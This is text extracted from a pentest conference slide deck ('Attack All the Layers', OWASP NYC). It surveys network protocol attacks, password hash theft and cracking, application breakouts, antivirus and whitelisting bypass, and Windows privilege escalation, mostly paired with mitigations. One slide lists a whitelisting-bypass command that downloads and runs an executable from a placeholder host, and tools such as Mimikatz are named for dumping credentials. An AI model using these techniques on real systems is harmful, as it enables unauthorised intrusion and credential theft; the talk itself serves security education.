attack all the layers: what's working during pentests (owasp nyc)

Attack All the Layers: What’s Working During Pen Tests

Scott Sutherland and Karl Fosaaen

Introductions

• Scott Sutherland

‒ Principal Security Consultant @ NetSPI

‒ Twitter: @_nullbind

• Karl Fosaaen

‒ Senior Security Consultant @ NetSPI

‒ Twitter: @kfosaaen

We specialize in boththings and stuff!

Overview

• Why do Companies Pen Test?

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

• Conclusions

Why do companies pen test?

• Compliance requirements

• Evaluate risks associated with an acquisition or partnership

• Validate preventative controls

• Validate detective controls

• Prioritize internal security initiatives

• Proactively prevent breaches

Overview

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Attacking protocols

• ARP: Address Resolution Protocol

• NBNS: NetBIOS Name Service

• SMB: Server Message Block

• PXE: Preboot Execution Environment

• DTP: Dynamic Trunking Protocol

Attacking protocols: ARP

Address

Resolution

Protocol

Attacking protocols: ARP

• General

‒MAC to IP association

‒Layer 2• Conditions

‒ Independent of user action

‒Broadcast network• Attacks

‒MITM Monitoring

‒MITM Injection

‒DOS

Attacking protocols: ARP

Attacking protocols: ARP

• Common mitigating controls:

‒ Dynamic ARP Inspection

‒ Port Security

‒ Static Routes (not recommended)

Attacking protocols: NBNS / LLMNR

NetBIOS

Name

Service

Attacking protocols: NBNS

• General‒ IP to hostname association

‒ Layer 5 / 7

• Constraints‒ Dependent on user action

‒ Broadcast Network

‒ Windows Only

• Attacks‒ MITM Monitoring

‒ MITM Injection

‒ DOS

Attacking protocols: NBNS

Attacking protocols: NBNS

Attacking protocols: NBNS

Attacking protocols: NBNS

• Common mitigating controls:

‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS

‒ Disable NBNS (recommended)

• Might cause issues with legacy apps

‒ Disable insecure authentication to help

• limit impact of exposed hashes

‒ Enable packet signing to help prevent

• SMB Relay attacks

Attacking protocols: SMB

Server

Message

Block

Attacking protocols: SMB

• General‒ SMB is the come back kid!

‒ Layer 7

• Constraints‒ Dependent on user action

‒ Any routable network

‒ No connecting back to originating host

• Attacks‒ Command execution

‒ Shells..aaand shells

Attacking protocols: SMB

Attacking protocols: SMB

• Historically, SMB Relay has been used to:

‒ Execute arbitrary commands

‒ Obtain shells

• Lately the community has been developing tools for doing things like:

‒ LDAP queries

‒ SQL queries

‒ Exchange services

‒ Mounting file systems

Attacking protocols: SMB

• Common mitigating controls:

‒ Enable packet signing to help prevent SMB Relay attacks

‒ Apply really old patches like if you missed out on the last decade…

Attacking protocols: PXE

Preboot

eXecution

Environment

Attacking protocols: PXE

• General

‒ DHCP

• Constraints

‒ Broadcast domain

• Attacks

‒ Command execution

‒ Access to file system/images

Attacking protocols: PXE

• Common mitigating controls:

‒ Isolate networks

‒ Add device validation

Attacking protocols: DTP

Dynamic

Trunking

Protocol

Attacking protocols: DTP

• General‒ 802.1Q encapsulation is in use

‒ Layer 2

• Constraints‒ Independent of user action

‒ Trunking is set to enabled • or auto on switch port

• Attacks‒ Monitor network traffic for all VLANs, because all VLANs are

• allowed on a trunk by default

• *Full VLAN hopping

Attacking protocols: DTP

Attacking protocols: DTP

Attacking protocols: DTP

Attacking protocols: DTP

Attacking protocols: DTP

• Common mitigating controls:

‒ Use dedicated VLAN ID for all trunking ports

‒ Disable all unused ports and place them on a non-routable VLAN

‒ Configure all user ports as access ports to prevent trunk negotiation

‒ Configure frames with two 802.1Q headers

‒ Configure strong VACLs

Overview

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Attacking passwords

• Hashes and Cracking (Offline)

• Dictionary Attacks (Online)

• Dump in Cleartext!

Attacking Passwords

Tool Function Year

Pass the Hash Passing Hashes 1997

Rainbow Tables Password Cracking 2000s

SMB Relay Relaying Captured Hashes 2001

John the Ripper Password Cracking 2001

NetNTLM.pl Cracking Network Hashes 2007

PTH Toolkit Pass all the Hashes 2008

Hashcat CPU and GPU Cracking 2010

WCE and Mimikatz Cleartext Windows Creds 2012

Attacking Passwords: Hashes

• What are hashes?

‒ A non-reversible way of storing passwords

‒ Operating systems and applications

‒ Lots of types

• LM/NTLM

• Network and Local

• MD5

• SHA

• descrypt

Attacking Passwords: Hashes

• How do we get hashes?

‒ Cain and Abel

‒ fgdump

‒ Metasploit

‒ Mimikatz

‒ Databases

‒ Config files

Attacking Passwords: Cracking

• Cracking Hashes

‒ Rainbow Tables

‒ John the Ripper

‒ oclHashcat

‒ CPU versus GPU

Attacking Passwords: Cracking

0

100

200

300

400

500

600

Minutes for Six Character Brute Force

CPU GPU

Attacking Passwords: CrackingG

PU

CP

U

Attacking Passwords: Passing Hashes

• Passing Hashes

‒ Metasploit

‒ psexec

‒ winexec

‒ PTH toolkit

Attacking Passwords: Dictionary

• Online Vs. Offline Attacks

• Dictionary Attacks

‒ Enumerate users

• Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc.

‒ Attack!

• Are users getting smarter?

‒ Sort of…

• “Summer2014” meets password

• complexity requirements

Attacking Passwords: Cleartext

• Common application configs

• Reversible Formats

‒ Find in files

‒ Groups.xml

‒ Unattend.xml

‒ Registry

• WCE

• Mimikatz

Overview

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Attacking Applications: Common

• Default and weak passwords

• SQL injection

• RFI/web shells

• Web directory traversals

• UNC path injection + SMB relay

• Critical missing patches

Attacking Applications: Breakouts

• Obtain a common dialog box

• Bypass folder path and file type restrictions

• Bypass file execution restrictions

• Bypass file black/white lists

• Access to native consoles and management tools

• Downloading and use third party applications

Overview

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Bypassing EPP: Anti-virus

• PowerShell code Injection

• Execute off network share

• Clone resource tables

• Modify import tables

• Pack files

Bypassing EPP: App White List

• Execution via approved apps

‒ Powershell Code Injection

‒ Rundll32 mydll,DLLMain@12

‒ IEExec http://x.x.x.x:8080/bypass.exe

• Exceptions

‒ File name

‒ Publisher

‒ Directory

• Excessive privileges

‒ Services and policy

Overview

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Windows Escalation: Overview

• Privilege Escalation Goals

• Local Privilege Escalation

• Domain Privilege Escalation

Windows Escalation: Goals

• Local Escalation Goals

‒ Find clear text or reversible credentials with local administrative privileges

‒ Get application to run commands as Administrator or LocalSystem

• Domain Escalation Goals

‒ Find Domain Admins

‒ Impersonate Domain Admins

Windows Escalation: Local

• Local Escalation

‒ *Clear text credentials in files, registry, over network

‒ Insecure service paths

‒ DLL preloading

‒ DLL and exe replacement

‒ Binary planting in auto-run locations (reg and file system)

‒ Modifying schedule tasks

‒ *Local and remote exploits

‒ Leverage local application like IIS, SQL Server etc

‒ *UNC path injection + SMB Relay / Capture + crack

Windows Escalation: Domain

• Domain Escalation – Find DAs

‒ Check locally! (Processes, Tokens, Cachedump)

‒ Review active sessions – netsess (veil)

‒ Review remote processes - tasklist

‒ Service Principal Names (SPN) – get-spn

‒ Scanning Remote Systems for NetBIOS Information - nbtscan

‒ Pass the hash to other systems

‒ PowerShell shell spraying

‒ WINRM/WINRS shell spraying

‒ Psexec shell spraying

Windows Escalation: Domain

• Domain Escalation – Impersonate DAs

‒ Dump passwords from memory with Mimikatz

‒ Migrate into the Domain Admin’s process

‒ Steal Domain Admins delegation tokens with Incognito

‒ Dump cached domain admin hashes with cachedump

‒ Relatively new techniques

• PTH using Kerberos ticket

Conclusions

• Most Networks

‒ Kind of broken

• Most Protocols

‒ Kind of broken

• Most Applications

‒ Kind of broken

All can kind of be fixed

Attack all the layers!

• Any questions?

Attack all the layers!

• Scott Sutherland

‒ Principal Security Consultant

‒ Twitter: @_nullbind

• Karl Fosaaen

‒ Senior Security Consultant

‒ Twitter: @kfosaaen